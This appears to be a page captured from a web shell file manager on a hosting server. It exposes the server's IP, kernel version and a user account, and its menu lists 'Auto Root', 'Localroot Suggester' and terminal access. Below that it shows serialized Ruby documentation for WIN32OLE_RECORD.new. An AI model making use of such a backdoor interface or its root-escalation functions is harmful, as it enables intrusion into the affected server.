Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.60
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby27 /
share /
ri /
system /
WIN32OLE_RECORD /
Delete
Unzip
Name
Size
Permission
Date
Action
cdesc-WIN32OLE_RECORD.ri
1.71
KB
-rw-r--r--
2023-06-06 18:25
inspect-i.ri
971
B
-rw-r--r--
2023-06-06 18:25
method_missing-i.ri
1.3
KB
-rw-r--r--
2023-06-06 18:25
new-c.ri
1.27
KB
-rw-r--r--
2023-06-06 18:25
ole_instance_variable_get-i.ri
1.31
KB
-rw-r--r--
2023-06-06 18:25
ole_instance_variable_set-i.ri
1.2
KB
-rw-r--r--
2023-06-06 18:25
to_h-i.ri
1.39
KB
-rw-r--r--
2023-06-06 18:25
typename-i.ri
1.22
KB
-rw-r--r--
2023-06-06 18:25
Save
Rename
U:RDoc::AnyMethod[iI"new:ETI"WIN32OLE_RECORD::new;TT:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [ I"OReturns WIN32OLE_RECORD object. The first argument is struct name (String ;TI"or Symbol). ;TI"TThe second parameter obj should be WIN32OLE object or WIN32OLE_TYPELIB object. ;TI"@If COM server in VB.NET ComServer project is the following:;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [ I",Imports System.Runtime.InteropServices ;TI"Public Class ComClass ;TI" Public Structure Book ;TI"/ <MarshalAs(UnmanagedType.BStr)> _ ;TI"$ Public title As String ;TI"$ Public cost As Integer ;TI" End Structure ;TI"End Class ;T:@format0o; ; [I"Athen, you can create WIN32OLE_RECORD object is as following:;T@o;; [ I"require 'win32ole' ;TI".obj = WIN32OLE.new('ComServer.ComClass') ;TI"Jbook1 = WIN32OLE_RECORD.new('Book', obj) # => WIN32OLE_RECORD object ;TI"tlib = obj.ole_typelib ;TI"Jbook2 = WIN32OLE_RECORD.new('Book', tlib) # => WIN32OLE_RECORD object;T; 0: @fileI"#ext/win32ole/win32ole_record.c;T:0@omit_headings_from_table_of_contents_below0I"BWIN32OLE_RECORD.new(typename, obj) -> WIN32OLE_RECORD object ;T0[ I" (p1, p2);T@&FI"WIN32OLE_RECORD;TcRDoc::NormalClass00